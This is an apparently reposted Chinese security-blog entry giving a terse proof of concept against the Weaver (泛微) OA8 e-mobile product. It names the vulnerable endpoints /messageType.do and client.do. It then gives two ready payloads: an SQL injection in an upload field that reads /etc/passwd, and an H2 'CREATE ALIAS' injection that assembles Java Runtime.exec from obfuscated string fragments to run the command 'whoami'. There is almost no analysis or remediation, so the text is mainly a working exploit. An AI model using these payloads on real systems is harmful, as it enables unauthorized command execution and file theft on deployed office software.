泛微OA8 e-mobile(新)

admin 2021年4月10日20:41:40评论787 views字数 457阅读1分31秒阅读模式

漏洞触发点:/messageType.do和client.do

poc:

1、uploadID"....1' union select 'uploadkey','filename','/etc/passwd','ct',5,6,'11','8'--..------WebKitFormBoundaryTm8
2、CREATE ALIAS cc83 AS CONCAT('void e(String cmd) throws java.io.IOException{','java.lan','g.Run','time rt= java.la','ng.Ru','ntime.getRu','ntime();rt.ex','ec(cmd);}');CALL cc83('whoami');like%20%27

 

相关推荐: 靶场攻略 | Chaos (hack the box)

nmap扫描结果:80/tcp    open     http|_http-title: Site doesn't have a title (text/html).1…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月10日20:41:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微OA8 e-mobile(新)http://cn-sec.com/archives/331896.html

发表评论

匿名网友 填写信息